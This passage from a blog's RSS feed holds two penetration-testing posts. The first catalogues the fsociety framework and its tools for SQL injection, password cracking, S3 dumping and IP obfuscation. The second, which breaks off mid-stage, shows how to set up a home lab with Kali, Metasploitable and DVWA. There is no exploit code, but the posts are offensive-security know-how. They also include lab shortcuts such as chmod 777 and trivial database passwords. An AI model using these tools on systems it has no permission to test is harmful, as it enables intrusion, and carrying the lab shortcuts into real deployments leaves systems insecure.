					<description><![CDATA[<p>Fsociety&#160;is a collection of tools which help the user perform a penetration test. The framework is very useful for the&#160;reconnaissance&#160;phase of a penetration test. It contains various popular tools which perform a wide range of functions from network scanning to password cracking.&#160;fsociety can be considered to be one of the best modular penetration testing framework’s [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/1874-2/">fsociety: Modular Penetration Testing Framework</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="row">
<div class="col-lg-12">
<p><img decoding="async" class="wp-image-13850 lazyloaded" src="https://cdn.cyberpunk.rs/wp-content/uploads/2020/07/fsociety-logo.jpg" sizes="(max-width: 400px) 100vw, 400px" srcset="https://cdn.cyberpunk.rs/wp-content/uploads/2020/07/fsociety-logo.jpg 400w, https://cdn.cyberpunk.rs/wp-content/uploads/2020/07/fsociety-logo-300x62.jpg 300w, https://cdn.cyberpunk.rs/wp-content/uploads/2020/07/fsociety-logo-350x72.jpg 350w" alt="fsociety logo" data-srcset="https://cdn.cyberpunk.rs/wp-content/uploads/2020/07/fsociety-logo.jpg 400w, https://cdn.cyberpunk.rs/wp-content/uploads/2020/07/fsociety-logo-300x62.jpg 300w, https://cdn.cyberpunk.rs/wp-content/uploads/2020/07/fsociety-logo-350x72.jpg 350w" data-src="https://cdn.cyberpunk.rs/wp-content/uploads/2020/07/fsociety-logo.jpg" data-sizes="(max-width: 400px) 100vw, 400px"></p>
<p>Fsociety&nbsp;is a collection of tools which help the user perform a penetration test. The framework is very useful for the&nbsp;reconnaissance&nbsp;phase of a penetration test. It contains various popular tools which perform a wide range of functions from network scanning to password cracking.&nbsp;fsociety can be considered to be one of the best modular penetration testing framework’s available today.</p>
<div class="wp-block-image text-center img-fluid">&nbsp;</div>
<h2>fsociety: Modular Penetration Testing Framework&nbsp;</h2>
<p>This framework currently contains 15 different tools which all perform different tasks. These tasks can range from hiding the IP address of the user, cracking the password on a web form and&nbsp;vulnerabilities&nbsp;on web servers. When used together, these tools can help user perform a complete penetration test ranging from network reconnaissance to exploitation.&nbsp;Impressively, this&nbsp;framework&nbsp;also includes an automatic SQL injection and database takeover tool. Lastly, users can find social media accounts from a simple username.&nbsp;</p>
<h3 class="accent-green">Features:&nbsp;</h3>
<ul>
<li>This framework currently contains 16 different tools, which perform a wide variety of tasks ranging from network&nbsp;reconnaissance&nbsp;to SQL injection.&nbsp;</li>
<li>Contains multiple password crackers which can be used in different situations.&nbsp;</li>
<li>The user&nbsp;can&nbsp;hide their identity with an IP obfuscator which will effectively make their IP address&nbsp;untraceable.&nbsp;</li>
<li>Hunt down social media accounts by username across social networks&nbsp;</li>
<li>Fast subdomains enumeration tool for penetration testers&nbsp;</li>
<li>A tool to find open S3 buckets and dump their contents&nbsp;</li>
</ul>
<h3>&nbsp;</h3>
<h3 class="accent-purple">fsociety Tools:</h3>
<div class="row">
<div class="col-12 col-lg-4">
<h4 class="accent-green">Information Gathering:</h4>
<p>– <a href="https://www.cyberpunk.rs/automatic-sql-injection-and-db-takeover-tool-sqlmap">sqlmap</a><br />
– Striker<br />
– Sublist3r<br />
– sherlock<br />
– S3Scanner<br />
– gitGraber<br />
– HydraRecon</p>
</div>
<div class="col-12 col-lg-4">
<h4>Networking Tools:</h4>
<p>– nmap<br />
– <a href="https://www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets">bettercap</a></p>
<h4>Web Hacking:</h4>
<p>– <a href="https://www.cyberpunk.rs/xsstrike-usage-example-v3-x">XSStrike</a><br />
– <a href="https://www.cyberpunk.rs/photon-incredibly-fast-web-crawler">Photon</a></p>
</div>
<div class="col-12 col-lg-4">
<h4>Password Attacks:</h4>
<p>– cupp<br />
– <a href="https://www.cyberpunk.rs/cr3dov3r-credential-reuse-attack-tool">Cr3d0v3r</a><br />
– Hash-Buster<br />
– changeme</p>
<h4>Obfuscation:</h4>
<p>– Cuteit</p>
</div>
</div>
<h3 class="accent-green">Supported Platforms:&nbsp;</h3>
<ul>
<li>Linux&nbsp;</li>
</ul>
<h3 class="accent-green">Requirements:</h3>
<ul>
<li>All from <code>requirements.txt</code></li>
</ul>
<h2>Install&nbsp;</h2>
<p>Clone the repo:</p>
<pre class="wp-block-preformatted">$ git clone https://github.com/fsociety-team/fsociety.git</pre>
<p>Run the following command:&nbsp;</p>
<pre class="wp-block-preformatted">$ pip install fsociety</pre>
<h3 class="accent-purple">Docker</h3>
<pre class="wp-block-preformatted">$ docker pull fsocietyteam/fsociety
$ docker run -it fsocietyteam/fsociety fsociety</pre>
<h3 class="accent-purple">Develop</h3>
<pre class="wp-block-preformatted">$ git clone https://github.com/fsociety-team/fsociety.git
$ pip install -e ".[dev]"</pre>
<h2>Usage&nbsp;</h2>
<p>Enter the following command:&nbsp;</p>
<pre class="wp-block-preformatted">$ fsociety -h</pre>
<pre class="wp-block-preformatted">usage: fsociety [-h] [-i] [-s]

A Penetration Testing Framework

optional arguments:
  -h, --help     show this help message and exit
  -i, --info     gets fsociety info
  -s, --suggest  suggest a tool</pre>
</div>
</div>
<p>The post <a href="http://kostacipo.stream/1874-2/">fsociety: Modular Penetration Testing Framework</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/1874-2/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How To Create A Virtual Penetration Testing Lab At Home</title>
		<link>http://kostacipo.stream/how-to-create-a-virtual-penetration-testing-lab-at-home/</link>
					<comments>http://kostacipo.stream/how-to-create-a-virtual-penetration-testing-lab-at-home/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Fri, 28 Aug 2020 12:14:58 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[kali linux]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1808</guid>

					<description><![CDATA[<p>&#160; In this article, we will demonstrate how to create your own virtual penetration testing lab at home. Creating a pentesting lab is must for learning different testing tools and hacks out of legal trouble because hacking into other computers and networks where you don’t have rights to access is illegal without prior consent so [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-create-a-virtual-penetration-testing-lab-at-home/">How To Create A Virtual Penetration Testing Lab At Home</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<div class="tdb-block-inner td-fix-index">
<p>In this article, we will demonstrate how to create your own virtual penetration testing lab at home. Creating a pentesting lab is must for learning different testing tools and hacks out of legal trouble because hacking into other computers and networks where you don’t have rights to access is illegal without prior consent so having your own lab that replicates someone else’s environment is a perfect platform to practice hacking and security testing skills.</p>
<p>Moreover, when you perform security testing on a system, there is a chance of severe damage that can permanently delete the data of targeted device or destroy the target computer or network but in your own pentesting lab you will have complete control over environment for testing and you can also configure the target to the exact specifications needed for the test.</p>
<p>Having said that, creating your own pentesting lab is easier if you are working on a virtual environment as it is cost-effective as well as scalable. So these are some prerequisites before creating your own pentesting lab:</p>
<ol>
<li>Virtualization should be enabled on the processor</li>
<li>VirtualBox or VMware must be installed</li>
<li>Atleast 8GB RAM of the host machine is required</li>
</ol>
<p>In our setup, we will configure one attacking machine (Kali Linux) and three target machines (DVWA, MetaSploitable and Windows10) on which the attacking machine will generate some exploits</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter wp-image-5359 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/DVWA-MetaSploitable-and-Windows10.png" sizes="(max-width: 616px) 100vw, 616px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/DVWA-MetaSploitable-and-Windows10.png 616w, https://www.ehacking.net/wp-content/uploads/2020/02/DVWA-MetaSploitable-and-Windows10-230x300.png 230w, https://www.ehacking.net/wp-content/uploads/2020/02/DVWA-MetaSploitable-and-Windows10-322x420.png 322w" alt="DVWA, MetaSploitable and Windows10" width="616" height="803"></p>
<h2><strong>Kali Linux</strong></h2>
<p>Kali Linux is a Debian based Linux distribution designed for penetration testing. In this setup it will be our attacking machine because it has some pre-installed penetration testing tools i.e. (<a href="https://www.wireshark.org/download.html">Wireshark</a>, <a href="https://www.aircrack-ng.org/">Aircrack-ng</a>, <a href="https://www.concise-courses.com/hacking-tools/vulnerability-exploitation-tools/beef/">BeEF</a>, <a href="https://portswigger.net/burp/">Burp Suite</a>, Metasploit Framework, <a href="https://github.com/vanhauser-thc/thc-hydra">Hydra</a>, <a href="https://cirt.net/Nikto2">Nikto</a>, <a href="https://www.paterva.com/web7/">Maltego</a>, <a href="https://nmap.org/">Nmap</a>) aid the pen-testers to gather information, perform scanning and find some vulnerabilities.</p>
<h2><strong>MetaSploitable</strong></h2>
<p>MetaSploitable is a virtual machine that is an intentionally vulnerable version of Ubuntu Linux specifically designed for penetration testing learners to test security tools and exploit common vulnerabilities. This project is created and maintained by rapid7 Community, Originally design for Metasploit Framework testing.</p>
<h3><strong>Installation of MetaSploitable</strong></h3>
<p>To install MetaSploitable in VirtualBox download the MetaSploitable file from <strong><a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/"><em>https://sourceforge.net/projects/metasploitable/files/Metasploitable2/</em></a></strong></p>
<p><img decoding="async" class="aligncenter wp-image-5360 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable.png" sizes="(max-width: 962px) 100vw, 962px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable.png 962w, https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable-300x165.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable-768x422.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable-696x383.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable-764x420.png 764w" alt="" width="962" height="529"></p>
<p>Open up VirtualBox and create a new VM by selecting ‘Machine’ and choosing the option ‘New’</p>
<p><img decoding="async" class="aligncenter wp-image-5361 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/VM-by-selecting-‘Machine’.png" sizes="(max-width: 834px) 100vw, 834px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/VM-by-selecting-‘Machine’.png 834w, https://www.ehacking.net/wp-content/uploads/2020/02/VM-by-selecting-‘Machine’-300x134.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/VM-by-selecting-‘Machine’-768x343.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/VM-by-selecting-‘Machine’-696x311.png 696w" alt="VM by selecting ‘Machine’" width="834" height="373"></p>
<p>Type name of the VM, set the destination where you want to install this VM, set the Type as Linux and version as Ubuntu(64-bit)</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5362 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Type-name-of-the-VM.png" sizes="auto, (max-width: 691px) 100vw, 691px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Type-name-of-the-VM.png 691w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-name-of-the-VM-300x269.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-name-of-the-VM-468x420.png 468w" alt="Type name of the VM" width="691" height="620">Set the memory size</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5363 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Set-the-memory-size.png" sizes="auto, (max-width: 694px) 100vw, 694px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Set-the-memory-size.png 694w, https://www.ehacking.net/wp-content/uploads/2020/02/Set-the-memory-size-300x266.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Set-the-memory-size-473x420.png 473w" alt="Set the memory size" width="694" height="616"></p>
<p>Use existing virtual hard disk file</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5364 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Use-existing-virtual-hard-disk-file.png" sizes="auto, (max-width: 692px) 100vw, 692px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Use-existing-virtual-hard-disk-file.png 692w, https://www.ehacking.net/wp-content/uploads/2020/02/Use-existing-virtual-hard-disk-file-300x267.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Use-existing-virtual-hard-disk-file-472x420.png 472w" alt="Use existing virtual hard disk file" width="692" height="616">Attach the vmdk file that you already downloaded</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5365 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded.png" sizes="auto, (max-width: 855px) 100vw, 855px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded.png 855w, https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded-300x185.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded-768x473.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded-696x429.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded-681x420.png 681w, https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded-356x220.png 356w" alt="Attach the vmdk file that you already downloaded" width="855" height="527"></p>
<p>Now start the VM</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5366 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM-300x162.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM-768x416.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM-696x377.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM-776x420.png 776w" alt="" width="975" height="528">After rebooting it will ask for login credentials. The default username and password are “msfadmin”</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5367 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin-300x187.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin-768x479.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin-696x434.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin-674x420.png 674w" alt="After rebooting it will ask for login credentials. The default username and password are “msfadmin" width="975" height="608"></p>
<p>After logging in successfully you will get the MetaSploitable prompt</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5368 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt-300x187.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt-768x478.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt-696x433.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt-675x420.png 675w" alt="After logging in successfully you will get the MetaSploitable prompt" width="975" height="607"></p>
<h2><strong>DVWA</strong></h2>
<p>Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that provides a platform to practice hacking. It is the best platform for beginners to come and practice security tools because it is damn vulnerable as mentioned in its name.</p>
<p>As hacking is an illegal practice there is a requirement for security professionals to test their skills and tools in a legal environment and help web developers better understand the processes of securing web applications. This could be achieved by using DVWA that is got a lot of vulnerabilities, helps the beginners to learn and practice ethical hacking.</p>
<p>It runs on a local server hence there is no need for an internet connection to use this web application. It has different security levels as a beginner, intermediate, and expert to aid security professionals at every stage of learning.</p>
<p><strong>Stages to Install DVWA</strong></p>
<p>We are using Kali Linux operating system to install DVWA because this OS is designed for penetration testing and there are many pre-installed security tools present in Kali Linux. After that you require to configure a database</p>
<p><strong>STAGE 01: Install DVWA on Kali Linux</strong></p>
<p>Go to web browser in Kali Linux and search the link <em>github.com/ethicalhack3r/DVWA</em> to copy the address</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5369 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux-300x198.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux-768x506.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux-696x459.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux-637x420.png 637w" alt="Install DVWA on Kali Linux" width="975" height="643"></p>
<p>Now go to terminal and switch the directory to /var/www/html/ because all the files need to be installed in this directory to run the web application</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5370 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/installed-in-this-directory.png" sizes="auto, (max-width: 439px) 100vw, 439px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/installed-in-this-directory.png 439w, https://www.ehacking.net/wp-content/uploads/2020/02/installed-in-this-directory-300x100.png 300w" alt="installed in this directory " width="439" height="147">After switching the directory type git clone and paste the address that you have copied from browser</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5371 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/After-switching-the-directory-type-git-clone-and-paste-the-address-that-you-have-copied-from-browser.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/After-switching-the-directory-type-git-clone-and-paste-the-address-that-you-have-copied-from-browser.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/After-switching-the-directory-type-git-clone-and-paste-the-address-that-you-have-copied-from-browser-300x42.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/After-switching-the-directory-type-git-clone-and-paste-the-address-that-you-have-copied-from-browser-768x109.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/After-switching-the-directory-type-git-clone-and-paste-the-address-that-you-have-copied-from-browser-696x99.png 696w" alt="After switching the directory type git clone and paste the address that you have copied from browser" width="975" height="138">The DVWA file has successfully cloned</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5372 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/The-DVWA-file-has-successfully-cloned.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/The-DVWA-file-has-successfully-cloned.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/The-DVWA-file-has-successfully-cloned-300x98.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/The-DVWA-file-has-successfully-cloned-768x252.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/The-DVWA-file-has-successfully-cloned-696x228.png 696w" alt="The DVWA file has successfully cloned" width="975" height="320">Type ‘ls’ to see DVWA directoy</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5373 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Type-‘ls’-to-see-DVWA-directoy.png" sizes="auto, (max-width: 972px) 100vw, 972px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Type-‘ls’-to-see-DVWA-directoy.png 972w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-‘ls’-to-see-DVWA-directoy-300x100.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-‘ls’-to-see-DVWA-directoy-768x255.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-‘ls’-to-see-DVWA-directoy-696x231.png 696w" alt="Type ‘ls’ to see DVWA directoy" width="972" height="323"></p>
<p>Give this directory all the permissions by typing “chmod –R 777 DVWA/”</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5374 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Give-this-directory-all-the-permissions-by-typing-“chmod-–R-777-DVWA”.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Give-this-directory-all-the-permissions-by-typing-“chmod-–R-777-DVWA”.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-this-directory-all-the-permissions-by-typing-“chmod-–R-777-DVWA”-300x106.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-this-directory-all-the-permissions-by-typing-“chmod-–R-777-DVWA”-768x270.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-this-directory-all-the-permissions-by-typing-“chmod-–R-777-DVWA”-696x245.png 696w" alt="Give this directory all the permissions by typing “chmod –R 777 DVWA”" width="975" height="343">Switch the config DVWA/config directory to set the configuration</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5375 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Switch-the-config-DVWA-config-directoy-to-set-the-configuration.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Switch-the-config-DVWA-config-directoy-to-set-the-configuration.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Switch-the-config-DVWA-config-directoy-to-set-the-configuration-300x115.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Switch-the-config-DVWA-config-directoy-to-set-the-configuration-768x294.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Switch-the-config-DVWA-config-directoy-to-set-the-configuration-696x266.png 696w" alt="Switch the config DVWA config directoy to set the configuration" width="975" height="373">Type ls to see the config file</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5376 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file-300x130.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file-768x333.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file-696x302.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file-968x420.png 968w" alt="Type ls to see the config file" width="975" height="423">This is the default configuration file. Make a copy of this file to keep the default configuration file that will help you to restore if you have made some mistakes while configuring this file.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-5377 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file-300x138.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file-768x353.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file-696x320.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file-914x420.png 914w" alt="default configuration file" width="975" height="448"></p>
<p>Now go to nano editor to edit the configuration</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5378 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration-300x140.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration-768x359.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration-696x326.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration-898x420.png 898w" alt="Now go to nano editor to edit the configuration" width="975" height="456"></p>
<p>In the editor set the username and password of your choice, save it and exit the editor</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5379 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/In-the-editor-set-the-username-and-password-of-your-choice-save-it-and-exit-the-editor.png" sizes="auto, (max-width: 700px) 100vw, 700px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/In-the-editor-set-the-username-and-password-of-your-choice-save-it-and-exit-the-editor.png 700w, https://www.ehacking.net/wp-content/uploads/2020/02/In-the-editor-set-the-username-and-password-of-your-choice-save-it-and-exit-the-editor-300x102.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/In-the-editor-set-the-username-and-password-of-your-choice-save-it-and-exit-the-editor-696x238.png 696w" alt="In the editor set the username and password of your choice, save it and exit the editor" width="700" height="238"></p>
<p><strong>STAGE 02: Configure the MYSQL Database</strong></p>
<p>Start the service</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5380 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Start-the-service.png" sizes="auto, (max-width: 464px) 100vw, 464px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Start-the-service.png 464w, https://www.ehacking.net/wp-content/uploads/2020/02/Start-the-service-300x59.png 300w" alt="" width="464" height="91">Login to mysql as root</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5382 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-300x121.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-768x310.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-696x281.png 696w" alt="" width="975" height="394"></p>
<p>&nbsp;</p>
<p>Create a new user in a database as:</p>
<ul>
<li>Create user ‘user’@’127.0.0.1’ identified by ‘321;</li>
</ul>
<p>The username and password should be the same as you have entered in the configuration file of DVWA</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5382 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-300x121.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-768x310.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-696x281.png 696w" alt="Create a new user in a database " width="975" height="394">Give user all the privileges over the database:</p>
<ul>
<li>grant all privileges on dvwa.* to ‘user’@127.0.0.1’ identified by ‘321’;</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5383 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Give-user-all-the-privileages-over-the-database.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Give-user-all-the-privileages-over-the-database.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-user-all-the-privileages-over-the-database-300x126.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-user-all-the-privileages-over-the-database-768x321.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-user-all-the-privileages-over-the-database-696x291.png 696w" alt="Give user all the privileages over the database" width="975" height="408"></p>
<p>Now exit the database</p>
<p>&nbsp;</p>
<p><strong>STAGE03: Configure the Apache Server</strong></p>
<p>First, start the service</p>
